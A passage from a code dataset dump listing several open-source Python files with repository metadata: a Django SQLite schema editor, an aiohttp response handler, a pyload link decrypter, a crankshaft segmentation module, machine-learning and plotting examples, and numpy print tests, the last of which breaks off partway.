repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
diego-d5000/MisValesMd | env/lib/python2.7/site-packages/django/db/backends/sqlite3/schema.py | 1 | 11456 | import _sqlite3 # isort:skip
import codecs
import copy
from decimal import Decimal
from django.apps.registry import Apps
from django.db.backends.base.schema import BaseDatabaseSchemaEditor
from django.utils import six
class DatabaseSchemaEditor(BaseDatabaseSchemaEditor):
sql_delete_table = "DROP TABLE %(table)s"
sql_create_inline_fk = "REFERENCES %(to_table)s (%(to_column)s)"
def quote_value(self, value):
try:
value = _sqlite3.adapt(value)
except _sqlite3.ProgrammingError:
pass
# Manual emulation of SQLite parameter quoting
if isinstance(value, type(True)):
return str(int(value))
elif isinstance(value, (Decimal, float)):
return str(value)
elif isinstance(value, six.integer_types):
return str(value)
elif isinstance(value, six.string_types):
return "'%s'" % six.text_type(value).replace("\'", "\'\'")
elif value is None:
return "NULL"
elif isinstance(value, (bytes, bytearray, six.memoryview)):
# Bytes are only allowed for BLOB fields, encoded as string
# literals containing hexadecimal data and preceded by a single "X"
# character:
# value = b'\x01\x02' => value_hex = b'0102' => return X'0102'
value = bytes(value)
hex_encoder = codecs.getencoder('hex_codec')
value_hex, _length = hex_encoder(value)
# Use 'ascii' encoding for b'01' => '01', no need to use force_text here.
return "X'%s'" % value_hex.decode('ascii')
else:
raise ValueError("Cannot quote parameter value %r of type %s" % (value, type(value)))
def _remake_table(self, model, create_fields=[], delete_fields=[], alter_fields=[], override_uniques=None,
override_indexes=None):
"""
Shortcut to transform a model from old_model into new_model
"""
# Work out the new fields dict / mapping
body = {f.name: f for f in model._meta.local_fields}
# Since mapping might mix column names and default values,
# its values must be already quoted.
mapping = {f.column: self.quote_name(f.column) for f in model._meta.local_fields}
# This maps field names (not columns) for things like unique_together
rename_mapping = {}
# If any of the new or altered fields is introducing a new PK,
# remove the old one
restore_pk_field = None
if any(f.primary_key for f in create_fields) or any(n.primary_key for o, n in alter_fields):
for name, field in list(body.items()):
if field.primary_key:
field.primary_key = False
restore_pk_field = field
if field.auto_created:
del body[name]
del mapping[field.column]
# Add in any created fields
for field in create_fields:
body[field.name] = field
# Choose a default and insert it into the copy map
if not field.many_to_many:
mapping[field.column] = self.quote_value(
self.effective_default(field)
)
# Add in any altered fields
for (old_field, new_field) in alter_fields:
body.pop(old_field.name, None)
mapping.pop(old_field.column, None)
body[new_field.name] = new_field
if old_field.null and not new_field.null:
case_sql = "coalesce(%(col)s, %(default)s)" % {
'col': self.quote_name(old_field.column),
'default': self.quote_value(self.effective_default(new_field))
}
mapping[new_field.column] = case_sql
else:
mapping[new_field.column] = self.quote_name(old_field.column)
rename_mapping[old_field.name] = new_field.name
# Remove any deleted fields
for field in delete_fields:
del body[field.name]
del mapping[field.column]
# Remove any implicit M2M tables
if field.many_to_many and field.rel.through._meta.auto_created:
return self.delete_model(field.rel.through)
# Work inside a new app registry
apps = Apps()
# Provide isolated instances of the fields to the new model body
# Instantiating the new model with an alternate db_table will alter
# the internal references of some of the provided fields.
body = copy.deepcopy(body)
# Work out the new value of unique_together, taking renames into
# account
if override_uniques is None:
override_uniques = [
[rename_mapping.get(n, n) for n in unique]
for unique in model._meta.unique_together
]
# Work out the new value for index_together, taking renames into
# account
if override_indexes is None:
override_indexes = [
[rename_mapping.get(n, n) for n in index]
for index in model._meta.index_together
]
# Construct a new model for the new state
meta_contents = {
'app_label': model._meta.app_label,
'db_table': model._meta.db_table + "__new",
'unique_together': override_uniques,
'index_together': override_indexes,
'apps': apps,
}
meta = type("Meta", tuple(), meta_contents)
body['Meta'] = meta
body['__module__'] = model.__module__
temp_model = type(model._meta.object_name, model.__bases__, body)
# Create a new table with that format. We remove things from the
# deferred SQL that match our table name, too
self.deferred_sql = [x for x in self.deferred_sql if model._meta.db_table not in x]
self.create_model(temp_model)
# Copy data from the old table
field_maps = list(mapping.items())
self.execute("INSERT INTO %s (%s) SELECT %s FROM %s" % (
self.quote_name(temp_model._meta.db_table),
', '.join(self.quote_name(x) for x, y in field_maps),
', '.join(y for x, y in field_maps),
self.quote_name(model._meta.db_table),
))
# Delete the old table
self.delete_model(model, handle_autom2m=False)
# Rename the new to the old
self.alter_db_table(temp_model, temp_model._meta.db_table, model._meta.db_table)
# Run deferred SQL on correct table
for sql in self.deferred_sql:
self.execute(sql.replace(temp_model._meta.db_table, model._meta.db_table))
self.deferred_sql = []
# Fix any PK-removed field
if restore_pk_field:
restore_pk_field.primary_key = True
def delete_model(self, model, handle_autom2m=True):
if handle_autom2m:
super(DatabaseSchemaEditor, self).delete_model(model)
else:
# Delete the table (and only that)
self.execute(self.sql_delete_table % {
"table": self.quote_name(model._meta.db_table),
})
def add_field(self, model, field):
"""
Creates a field on a model.
Usually involves adding a column, but may involve adding a
table instead (for M2M fields)
"""
# Special-case implicit M2M tables
if field.many_to_many and field.rel.through._meta.auto_created:
return self.create_model(field.rel.through)
self._remake_table(model, create_fields=[field])
def remove_field(self, model, field):
"""
Removes a field from a model. Usually involves deleting a column,
but for M2Ms may involve deleting a table.
"""
# M2M fields are a special case
if field.many_to_many:
# For implicit M2M tables, delete the auto-created table
if field.rel.through._meta.auto_created:
self.delete_model(field.rel.through)
# For explicit "through" M2M fields, do nothing
# For everything else, remake.
else:
# It might not actually have a column behind it
if field.db_parameters(connection=self.connection)['type'] is None:
return
self._remake_table(model, delete_fields=[field])
def _alter_field(self, model, old_field, new_field, old_type, new_type,
old_db_params, new_db_params, strict=False):
"""Actually perform a "physical" (non-ManyToMany) field update."""
# Alter by remaking table
self._remake_table(model, alter_fields=[(old_field, new_field)])
def alter_index_together(self, model, old_index_together, new_index_together):
"""
Deals with a model changing its index_together.
Note: The input index_togethers must be doubly-nested, not the single-
nested ["foo", "bar"] format.
"""
self._remake_table(model, override_indexes=new_index_together)
def alter_unique_together(self, model, old_unique_together, new_unique_together):
"""
Deals with a model changing its unique_together.
Note: The input unique_togethers must be doubly-nested, not the single-
nested ["foo", "bar"] format.
"""
self._remake_table(model, override_uniques=new_unique_together)
def _alter_many_to_many(self, model, old_field, new_field, strict):
"""
Alters M2Ms to repoint their to= endpoints.
"""
if old_field.rel.through._meta.db_table == new_field.rel.through._meta.db_table:
# The field name didn't change, but some options did; we have to propagate this altering.
self._remake_table(
old_field.rel.through,
alter_fields=[(
# We need the field that points to the target model, so we can tell alter_field to change it -
# this is m2m_reverse_field_name() (as opposed to m2m_field_name, which points to our model)
old_field.rel.through._meta.get_field(old_field.m2m_reverse_field_name()),
new_field.rel.through._meta.get_field(new_field.m2m_reverse_field_name()),
)],
override_uniques=(new_field.m2m_field_name(), new_field.m2m_reverse_field_name()),
)
return
# Make a new through table
self.create_model(new_field.rel.through)
# Copy the data across
self.execute("INSERT INTO %s (%s) SELECT %s FROM %s" % (
self.quote_name(new_field.rel.through._meta.db_table),
', '.join([
"id",
new_field.m2m_column_name(),
new_field.m2m_reverse_name(),
]),
', '.join([
"id",
old_field.m2m_column_name(),
old_field.m2m_reverse_name(),
]),
self.quote_name(old_field.rel.through._meta.db_table),
))
# Delete the old through table
self.delete_model(old_field.rel.through)
| mit | 8,917,223,311,476,454,000 | 43.102362 | 114 | 0.56669 | false |
AustereCuriosity/astropy | astropy/samp/tests/test_hub_proxy.py | 1 | 1178 | from ..hub_proxy import SAMPHubProxy
from ..hub import SAMPHubServer
from .. import conf
def setup_module(module):
conf.use_internet = False
class TestHubProxy(object):
def setup_method(self, method):
self.hub = SAMPHubServer(web_profile=False, mode='multiple', pool_size=1)
self.hub.start()
self.proxy = SAMPHubProxy()
self.proxy.connect(hub=self.hub, pool_size=1)
def teardown_method(self, method):
if self.proxy.is_connected:
self.proxy.disconnect()
self.hub.stop()
def test_is_connected(self):
assert self.proxy.is_connected
def test_disconnect(self):
self.proxy.disconnect()
def test_ping(self):
self.proxy.ping()
def test_registration(self):
result = self.proxy.register(self.proxy.lockfile["samp.secret"])
self.proxy.unregister(result['samp.private-key'])
def test_custom_lockfile(tmpdir):
lockfile = tmpdir.join('.samptest').realpath().strpath
hub = SAMPHubServer(web_profile=False, lockfile=lockfile, pool_size=1)
hub.start()
proxy = SAMPHubProxy()
proxy.connect(hub=hub, pool_size=1)
hub.stop()
| bsd-3-clause | 5,713,479,540,355,891,000 | 21.653846 | 81 | 0.654499 | false |
fxia22/pointGAN | show_gan_rnn.py | 1 | 2043 | from __future__ import print_function
from show3d_balls import *
import argparse
import os
import random
import numpy as np
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim as optim
import torch.utils.data
import torchvision.datasets as dset
import torchvision.transforms as transforms
import torchvision.utils as vutils
from torch.autograd import Variable
from datasets import PartDataset
from pointnet import PointGen, PointGenR
import torch.nn.functional as F
import matplotlib.pyplot as plt
#showpoints(np.random.randn(2500,3), c1 = np.random.uniform(0,1,size = (2500)))
parser = argparse.ArgumentParser()
parser.add_argument('--model', type=str, default = '', help='model path')
opt = parser.parse_args()
print (opt)
gen = PointGenR()
gen.load_state_dict(torch.load(opt.model))
#sim_noise = Variable(torch.randn(5, 2, 20))
#
#sim_noises = Variable(torch.zeros(5, 15, 20))
#
#for i in range(15):
# x = i/15.0
# sim_noises[:,i,:] = sim_noise[:,0,:] * x + sim_noise[:,1,:] * (1-x)
#
#points = gen(sim_noises)
#point_np = points.transpose(2,1).data.numpy()
sim_noise = Variable(torch.randn(5, 6, 20))
sim_noises = Variable(torch.zeros(5, 30 * 5,20))
for j in range(5):
for i in range(30):
x = (1-i/30.0)
sim_noises[:,i + 30 * j,:] = sim_noise[:,j,:] * x + sim_noise[:,(j+1) % 5,:] * (1-x)
points = gen(sim_noises)
point_np = points.transpose(2,1).data.numpy()
print(point_np.shape)
for i in range(150):
print(i)
frame = showpoints_frame(point_np[i])
plt.imshow(frame)
plt.axis('off')
plt.savefig('%s/%04d.png' %('out_rgan', i), bbox_inches='tight')
plt.clf()
#showpoints(point_np)
#sim_noise = Variable(torch.randn(5, 1000, 20))
#points = gen(sim_noise)
#point_np = points.transpose(2,1).data.numpy()
#print(point_np.shape)
#choice = np.random.choice(2500, 2048, replace=False)
#print(point_np[:, choice, :].shape)
#showpoints(point_np)
#np.savez('rgan.npz', points = point_np[:, choice, :])
| mit | -721,880,346,011,303,300 | 23.035294 | 92 | 0.675967 | false |
alex-eri/aiohttp-1 | aiohttp/client_proto.py | 1 | 6070 | import asyncio
import asyncio.streams
from .client_exceptions import (ClientOSError, ClientPayloadError,
ClientResponseError, ServerDisconnectedError)
from .http import HttpResponseParser, StreamWriter
from .streams import EMPTY_PAYLOAD, DataQueue
class ResponseHandler(DataQueue, asyncio.streams.FlowControlMixin):
"""Helper class to adapt between Protocol and StreamReader."""
def __init__(self, *, loop=None, **kwargs):
asyncio.streams.FlowControlMixin.__init__(self, loop=loop)
DataQueue.__init__(self, loop=loop)
self.paused = False
self.transport = None
self.writer = None
self._should_close = False
self._message = None
self._payload = None
self._payload_parser = None
self._reading_paused = False
self._timer = None
self._skip_status = ()
self._tail = b''
self._upgraded = False
self._parser = None
@property
def upgraded(self):
return self._upgraded
@property
def should_close(self):
if (self._payload is not None and
not self._payload.is_eof() or self._upgraded):
return True
return (self._should_close or self._upgraded or
self.exception() is not None or
self._payload_parser is not None or
len(self) or self._tail)
def close(self):
transport = self.transport
if transport is not None:
transport.close()
self.transport = None
return transport
def is_connected(self):
return self.transport is not None
def connection_made(self, transport):
self.transport = transport
self.writer = StreamWriter(self, transport, self._loop)
def connection_lost(self, exc):
if self._payload_parser is not None:
try:
self._payload_parser.feed_eof()
except Exception:
pass
try:
self._parser.feed_eof()
except Exception as e:
if self._payload is not None:
self._payload.set_exception(
ClientPayloadError('Response payload is not completed'))
if not self.is_eof():
if isinstance(exc, OSError):
exc = ClientOSError(*exc.args)
if exc is None:
exc = ServerDisconnectedError()
DataQueue.set_exception(self, exc)
self.transport = self.writer = None
self._should_close = True
self._parser = None
self._message = None
self._payload = None
self._payload_parser = None
self._reading_paused = False
super().connection_lost(exc)
def eof_received(self):
pass
def pause_reading(self):
if not self._reading_paused:
try:
self.transport.pause_reading()
except (AttributeError, NotImplementedError, RuntimeError):
pass
self._reading_paused = True
def resume_reading(self):
if self._reading_paused:
try:
self.transport.resume_reading()
except (AttributeError, NotImplementedError, RuntimeError):
pass
self._reading_paused = False
def set_exception(self, exc):
self._should_close = True
super().set_exception(exc)
def set_parser(self, parser, payload):
self._payload = payload
self._payload_parser = parser
if self._tail:
data, self._tail = self._tail, None
self.data_received(data)
def set_response_params(self, *, timer=None,
skip_payload=False,
skip_status_codes=(),
read_until_eof=False):
self._skip_payload = skip_payload
self._skip_status_codes = skip_status_codes
self._read_until_eof = read_until_eof
self._parser = HttpResponseParser(
self, self._loop, timer=timer,
payload_exception=ClientPayloadError,
read_until_eof=read_until_eof)
if self._tail:
data, self._tail = self._tail, b''
self.data_received(data)
def data_received(self, data):
if not data:
return
# custom payload parser
if self._payload_parser is not None:
eof, tail = self._payload_parser.feed_data(data)
if eof:
self._payload = None
self._payload_parser = None
if tail:
self.data_received(tail)
return
else:
if self._upgraded or self._parser is None:
# i.e. websocket connection, websocket parser is not set yet
self._tail += data
else:
# parse http messages
try:
messages, upgraded, tail = self._parser.feed_data(data)
except BaseException as exc:
import traceback
traceback.print_exc()
self._should_close = True
self.set_exception(
ClientResponseError(code=400, message=str(exc)))
self.transport.close()
return
self._upgraded = upgraded
for message, payload in messages:
if message.should_close:
self._should_close = True
self._message = message
self._payload = payload
if (self._skip_payload or
message.code in self._skip_status_codes):
self.feed_data((message, EMPTY_PAYLOAD), 0)
else:
self.feed_data((message, payload), 0)
if upgraded:
self.data_received(tail)
else:
self._tail = tail
| apache-2.0 | 8,525,949,508,562,163,000 | 30.780105 | 77 | 0.531796 | false |
martinhbramwell/evalOfFlask | frmwk/forms/attic/demo_forms.py | 1 | 1202 | from flask.ext.wtf import Form, TextField, BooleanField, TextAreaField
from flask.ext.wtf import Required, Length
from flask.ext.babel import gettext
from frmwk.model.mdUser import User
class EditForm(Form):
nickname = TextField('nickname', validators = [Required()])
about_me = TextAreaField('about_me', validators = [Length(min = 0, max = 140)])
def __init__(self, original_nickname, *args, **kwargs):
Form.__init__(self, *args, **kwargs)
self.original_nickname = original_nickname
def validate(self):
if not Form.validate(self):
return False
if self.nickname.data == self.original_nickname:
return True
if self.nickname.data != User.make_valid_nickname(self.nickname.data):
self.nickname.errors.append(gettext('This nickname has invalid characters. Please use letters, numbers, dots and underscores only.'))
return False
user = User.query.filter_by(nickname = self.nickname.data).first()
if user != None:
self.nickname.errors.append(gettext('This nickname is already in use. Please choose another one.'))
return False
return True
| bsd-3-clause | 4,632,528,655,272,532,000 | 41.928571 | 145 | 0.65807 | false |
Zerknechterer/pyload | module/plugins/crypter/MultiloadCz.py | 1 | 1754 | # -*- coding: utf-8 -*-
import re
from module.plugins.internal.Crypter import Crypter
class MultiloadCz(Crypter):
__name__ = "MultiloadCz"
__type__ = "crypter"
__version__ = "0.41"
__pattern__ = r'http://(?:[^/]*\.)?multiload\.cz/(stahnout|slozka)/.+'
__config__ = [("use_subfolder" , "bool", "Save package to subfolder" , True),
("subfolder_per_pack", "bool", "Create a subfolder for each package" , True),
("usedHoster" , "str" , "Prefered hoster list (bar-separated)", "" ),
("ignoredHoster" , "str" , "Ignored hoster list (bar-separated)" , "" )]
__description__ = """Multiload.cz decrypter plugin"""
__license__ = "GPLv3"
__authors__ = [("zoidberg", "[email protected]")]
FOLDER_PATTERN = r'<form action="" method="get"><textarea.*?>([^>]*)</textarea></form>'
LINK_PATTERN = r'<p class="manager-server"><strong>([^<]+)</strong></p><p class="manager-linky"><a href="(.+?)">'
def decrypt(self, pyfile):
self.html = self.load(pyfile.url, decode=True)
if re.match(self.__pattern__, pyfile.url).group(1) == "slozka":
m = re.search(self.FOLDER_PATTERN, self.html)
if m:
self.urls.extend(m.group(1).split())
else:
m = re.findall(self.LINK_PATTERN, self.html)
if m:
prefered_set = set(self.getConfig('usedHoster').split('|'))
self.urls.extend(x[1] for x in m if x[0] in prefered_set)
if not self.urls:
ignored_set = set(self.getConfig('ignoredHoster').split('|'))
self.urls.extend(x[1] for x in m if x[0] not in ignored_set)
| gpl-3.0 | -8,429,412,199,865,437,000 | 40.761905 | 117 | 0.530217 | false |
CartoDB/crankshaft | release/python/0.8.2/crankshaft/crankshaft/segmentation/segmentation.py | 1 | 8893 | """
Segmentation creation and prediction
"""
import numpy as np
from sklearn.ensemble import GradientBoostingRegressor
from sklearn import metrics
from sklearn.cross_validation import train_test_split
from crankshaft.analysis_data_provider import AnalysisDataProvider
# NOTE: added optional param here
class Segmentation(object):
"""
Add docstring
"""
def __init__(self, data_provider=None):
if data_provider is None:
self.data_provider = AnalysisDataProvider()
else:
self.data_provider = data_provider
def create_and_predict_segment_agg(self, target, features, target_features,
target_ids, model_parameters):
"""
Version of create_and_predict_segment that works on arrays that come
straight form the SQL calling the function.
Input:
@param target: The 1D array of length NSamples containing the
target variable we want the model to predict
@param features: The 2D array of size NSamples * NFeatures that
form the input to the model
@param target_ids: A 1D array of target_ids that will be used
to associate the results of the prediction with the rows which
they come from
@param model_parameters: A dictionary containing parameters for
the model.
"""
clean_target, _ = replace_nan_with_mean(target)
clean_features, _ = replace_nan_with_mean(features)
target_features, _ = replace_nan_with_mean(target_features)
model, accuracy = train_model(clean_target, clean_features,
model_parameters, 0.2)
prediction = model.predict(target_features)
accuracy_array = [accuracy] * prediction.shape[0]
return zip(target_ids, prediction, accuracy_array)
def create_and_predict_segment(self, query, variable, feature_columns,
target_query, model_params,
id_col='cartodb_id'):
"""
generate a segment with machine learning
Stuart Lynn
@param query: subquery that data is pulled from for packaging
@param variable: name of the target variable
@param feature_columns: list of column names
@target_query: The query to run to obtain the data to predict
@param model_params: A dictionary of model parameters, the full
specification can be found on the
scikit learn page for [GradientBoostingRegressor]
(http://scikit-learn.org/stable/modules/generated/sklearn.ensemble.GradientBoostingRegressor.html)
"""
params = {"subquery": target_query,
"id_col": id_col}
(target, features, target_mean,
feature_means) = self.clean_data(query, variable, feature_columns)
model, accuracy = train_model(target, features, model_params, 0.2)
result = self.predict_segment(model, feature_columns, target_query,
feature_means)
accuracy_array = [accuracy] * result.shape[0]
rowid = self.data_provider.get_segmentation_data(params)
'''
rowid = [{'ids': [2.9, 4.9, 4, 5, 6]}]
'''
return zip(rowid[0]['ids'], result, accuracy_array)
def predict_segment(self, model, feature_columns, target_query,
feature_means):
"""
Use the provided model to predict the values for the new feature set
Input:
@param model: The pretrained model
@features_col: A list of features to use in the
model prediction (list of column names)
@target_query: The query to run to obtain the data to predict
on and the cartodb_ids associated with it.
"""
batch_size = 1000
params = {"subquery": target_query,
"feature_columns": feature_columns}
results = []
cursors = self.data_provider.get_segmentation_predict_data(params)
'''
cursors = [{'features': [[m1[0],m2[0],m3[0]],[m1[1],m2[1],m3[1]],
[m1[2],m2[2],m3[2]]]}]
'''
while True:
rows = cursors.fetch(batch_size)
if not rows:
break
batch = np.row_stack([np.array(row['features'])
for row in rows]).astype(float)
batch = replace_nan_with_mean(batch, feature_means)[0]
prediction = model.predict(batch)
results.append(prediction)
# NOTE: we removed the cartodb_ids calculation in here
return np.concatenate(results)
def clean_data(self, query, variable, feature_columns):
"""
Add docstring
"""
params = {"subquery": query,
"target": variable,
"features": feature_columns}
data = self.data_provider.get_segmentation_model_data(params)
'''
data = [{'target': [2.9, 4.9, 4, 5, 6],
'feature1': [1,2,3,4], 'feature2' : [2,3,4,5]}]
'''
# extract target data from data_provider object
target = np.array(data[0]['target'], dtype=float)
# put n feature data arrays into an n x m array of arrays
features = np.column_stack([np.array(data[0][col])
for col in feature_columns]).astype(float)
features, feature_means = replace_nan_with_mean(features)
target, target_mean = replace_nan_with_mean(target)
return target, features, target_mean, feature_means
def replace_nan_with_mean(array, means=None):
"""
Input:
@param array: an array of floats which may have null-valued
entries
Output:
array with nans filled in with the mean of the dataset
"""
# returns an array of rows and column indices
nanvals = np.isnan(array)
indices = np.where(nanvals)
def loops(array, axis):
try:
return np.shape(array)[axis]
except IndexError:
return 1
ran = loops(array, 1)
if means is None:
means = {}
if ran == 1:
array = np.array(array)
means[0] = np.mean(array[~np.isnan(array)])
for row in zip(*indices):
array[row] = means[0]
else:
for col in range(ran):
means[col] = np.mean(array[~np.isnan(array[:, col]), col])
for row, col in zip(*indices):
array[row, col] = means[col]
else:
if ran == 1:
for row in zip(*indices):
array[row] = means[0]
else:
for row, col in zip(*indices):
array[row, col] = means[col]
return array, means
def train_model(target, features, model_params, test_split):
"""
Train the Gradient Boosting model on the provided data to calculate
the accuracy of the model
Input:
@param target: 1D Array of the variable that the model is to be
trained to predict
@param features: 2D Array NSamples *NFeatures to use in training
the model
@param model_params: A dictionary of model parameters, the full
specification can be found on the
scikit learn page for [GradientBoostingRegressor]
(http://scikit-learn.org/stable/modules/generated/sklearn.ensemble.GradientBoostingRegressor.html)
@parma test_split: The fraction of the data to be withheld for
testing the model / calculating the accuray
"""
features_train, features_test, \
target_train, target_test = train_test_split(features, target,
test_size=test_split)
model = GradientBoostingRegressor(**model_params)
model.fit(features_train, target_train)
accuracy = calculate_model_accuracy(model, features_test, target_test)
return model, accuracy
def calculate_model_accuracy(model, features_test, target_test):
"""
Calculate the mean squared error of the model prediction
Input:
@param model: model trained from input features
@param features_test: test features set to make prediction from
@param target_test: test target set to compare predictions to
Output:
mean squared error of the model prection compared target_test
"""
prediction = model.predict(features_test)
return metrics.mean_squared_error(prediction, target_test)
| bsd-3-clause | 7,995,125,924,327,904,000 | 38.004386 | 122 | 0.574834 | false |
openconfig/oc-pyang | openconfig_pyang/plugins/util/yangpath.py | 1 | 1676 | """Copyright 2016 The OpenConfig Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Utilities for manipulating YANG paths
"""
import re
def split_paths(path):
"""Return a list of path elements.
Args:
path: A YANG path string specified as /a/b
Returns:
A list of path components
"""
components = path.split("/")
return [c for c in components if c]
def strip_namespace(path):
"""Removes namespace prefixes from elements of the supplied path.
Args:
path: A YANG path string
Returns:
A YANG path string with the namespaces removed.
"""
re_ns = re.compile(r"^.+:")
path_components = [re_ns.sub("", comp) for comp in path.split("/")]
pathstr = "/".join(path_components)
return pathstr
def remove_last(path):
"""Removes the last path element and returns both parts.
Note the last '/' is not returned in either part.
Args:
path: A path string represented as a / separated string
Returns:
A tuple of:
0: the path with the last element removed (string)
1: the name of the last element (string)
"""
components = path.split("/")
last = components.pop()
prefix = "/".join(components)
return (prefix, last)
| apache-2.0 | 9,101,595,041,839,160,000 | 24.014925 | 72 | 0.704057 | false |
rossant/galry | examples/mandelbrot.py | 1 | 1978 | """GPU-based interactive Mandelbrot fractal example."""
from galry import *
import numpy as np
import numpy.random as rdn
FSH = """
// take a position and a number of iterations, and
// returns the first iteration where the system escapes a box of size N.
int mandelbrot_escape(vec2 pos, int iterations)
{
vec2 z = vec2(0., 0.);
int n = 0;
int N = 10;
int N2 = N * N;
float r2 = 0.;
for (int i = 0; i < iterations; i++)
{
float zx = z.x * z.x - z.y * z.y + pos.x;
float zy = 2 * z.x * z.y + pos.y;
r2 = zx * zx + zy * zy;
if (r2 > N2)
{
n = i;
break;
}
z = vec2(zx, zy);
}
return n;
}
"""
FS = """
// this vector contains the coordinates of the current pixel
// varying_tex_coords contains a position in [0,1]^2
vec2 pos = vec2(-2.0 + 3. * varying_tex_coords.x,
-1.5 + 3. * varying_tex_coords.y);
// run mandelbrot system
int n = mandelbrot_escape(pos, iterations);
float c = log(float(n)) / log(float(iterations));
// compute the red value as a function of n
out_color = vec4(c, 0., 0., 1.);
"""
def get_iterations(zoom=1):
return int(500 * np.log(1 + zoom))
class MandelbrotVisual(TextureVisual):
def initialize_fragment(self):
self.add_fragment_header(FSH)
self.add_fragment_main(FS)
def base_mandelbrot(self, iterations=None):
if iterations is None:
iterations = get_iterations()
self.add_uniform("iterations", vartype="int", ndim=1, data=iterations)
def initialize(self, *args, **kwargs):
iterations = kwargs.pop('iterations', None)
super(MandelbrotVisual, self).initialize(*args, **kwargs)
self.base_mandelbrot(iterations)
def update(figure, parameter):
zoom = figure.get_processor('navigation').sx
figure.set_data(iterations=get_iterations(zoom))
figure(constrain_ratio=True,
constrain_navigation=True,)
visual(MandelbrotVisual)
# event('Pan', pan)
event('Zoom', update)
show() | bsd-3-clause | 5,936,480,683,851,878,000 | 24.701299 | 78 | 0.627401 | false |
textioHQ/pattern | examples/05-vector/06-svm.py | 1 | 4083 | from __future__ import print_function
import os
import sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "..", ".."))
import random
from pattern.db import Datasheet
from pattern_text.nl import tag, predicative
from pattern.vector import SVM, KNN, NB, count, shuffled
# This example demonstrates a Support Vector Machine (SVM).
# SVM is a robust classifier that uses "kernel" functions.
# See: http://www.clips.ua.ac.be/pages/pattern-vector#svm
#
# As a metaphor, imagine the following game:
# - The ground is scattered with red and blue marbles.
# - It is your task to separate them using a single, straight line.
#
# The separation is going to be a rough approximation, obviously.
#
# Now imagine the following game:
# - The room is filled with static, floating red and blue marbles.
# - It is your task to separate them by inserting a glass panel between them.
#
# The 3-D space gives a lot more options. Adding more dimensions add even more options.
# This is roughly what a SVM does, using kernel functions to push the separation
# to a higher dimension.
# Pattern includes precompiled C binaries of libsvm.
# If these do not work on your system you have to compile libsvm manually.
# You can also change the "SVM()" statement below with "KNN()",
# so you can still follow the rest of the example.
classifier = SVM()
# We'll build a classifier to predict sentiment in Dutch movie reviews.
# For example, "geweldige film!" (great movie) indicates a positive sentiment.
# The CSV file at pattern/test/corpora/polarity-nl-bol.com.csv
# contains 1,500 positive and 1,500 negative reviews.
# The pattern.vector module has a shuffled() function
# which we use to randomly arrange the reviews in the list:
print("loading data...")
data = os.path.join(os.path.dirname(__file__), "..", "..",
"test", "corpora", "polarity-nl-bol.com.csv")
data = Datasheet.load(data)
data = shuffled(data)
# We do not necessarily need Document objects as in the previous examples.
# We can train any classifier on simple Python dictionaries too.
# This is sometimes easier if you want full control over the data.
# The instance() function below returns a train/test instance for a given review:
# 1) parse the review for part-of-speech tags,
# 2) keep adjectives, adverbs and exclamation marks (these mainly carry sentiment),
# 3) lemmatize the Dutch adjectives, e.g., "goede" => "goed" (good).
# 4) count the distinct words in the list, map it to a dictionary.
def instance(review): # "Great book!"
# [("Great", "JJ"), ("book", "NN"), ("!", "!")]
v = tag(review)
v = [word for (word, pos) in v if pos in ("JJ", "RB") or word in ("!")]
v = [predicative(word) for word in v] # ["great", "!", "!"]
v = count(v) # {"great": 1, "!": 1}
return v
# We can add any kind of features to a custom instance dict.
# For example, in a deception detection experiment
# we may want to populate the dict with PRP (pronouns), punctuation marks,
# average sentence length, a score for word diversity, etc.
# Use 1,000 random instances as training material.
print("training...")
for score, review in data[:1000]:
classifier.train(instance(review), type=int(score) > 0)
# classifier.save("sentiment-nl-svm.p")
#classifier = SVM.load("sentiment-nl-svm.p")
# Use 500 random instances as test.
print("testing...")
i = n = 0
for score, review in data[1000:1500]:
if classifier.classify(instance(review)) == (int(score) > 0):
i += 1
n += 1
# The overall accuracy is around 82%.
# A Naieve Bayes classifier has about 78% accuracy.
# A KNN classifier has about 80% accuracy.
# Careful: to get a reliable score you need to calculate precision and recall,
# study the documentation at:
# http://www.clips.ua.ac.be/pages/pattern-metrics#accuracy
print(float(i) / n)
# The work is not done here.
# Low accuracy is disappointing, but high accuracy is often suspicious.
# Things to look out for:
# - distinction between train and test set,
# - overfitting: http://en.wikipedia.org/wiki/Overfitting
| bsd-3-clause | -5,175,451,043,334,958,000 | 38.640777 | 87 | 0.70267 | false |
gmcastil/numpy | numpy/core/tests/test_arrayprint.py | 1 | 7408 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import division, absolute_import, print_function
import sys
import numpy as np
from numpy.compat import sixu
from numpy.testing import (
TestCase, run_module_suite, assert_, assert_equal
)
class TestArrayRepr(object):
def test_nan_inf(self):
x = np.array([np.nan, np.inf])
assert_equal(repr(x), 'array([ nan, inf])')
class TestComplexArray(TestCase):
def test_str(self):
rvals = [0, 1, -1, np.inf, -np.inf, np.nan]
cvals = [complex(rp, ip) for rp in rvals for ip in rvals]
dtypes = [np.complex64, np.cdouble, np.clongdouble]
actual = [str(np.array([c], dt)) for c in cvals for dt in dtypes]
wanted = [
'[ 0.+0.j]', '[ 0.+0.j]', '[ 0.0+0.0j]',
'[ 0.+1.j]', '[ 0.+1.j]', '[ 0.0+1.0j]',
'[ 0.-1.j]', '[ 0.-1.j]', '[ 0.0-1.0j]',
'[ 0.+infj]', '[ 0.+infj]', '[ 0.0+infj]',
'[ 0.-infj]', '[ 0.-infj]', '[ 0.0-infj]',
'[ 0.+nanj]', '[ 0.+nanj]', '[ 0.0+nanj]',
'[ 1.+0.j]', '[ 1.+0.j]', '[ 1.0+0.0j]',
'[ 1.+1.j]', '[ 1.+1.j]', '[ 1.0+1.0j]',
'[ 1.-1.j]', '[ 1.-1.j]', '[ 1.0-1.0j]',
'[ 1.+infj]', '[ 1.+infj]', '[ 1.0+infj]',
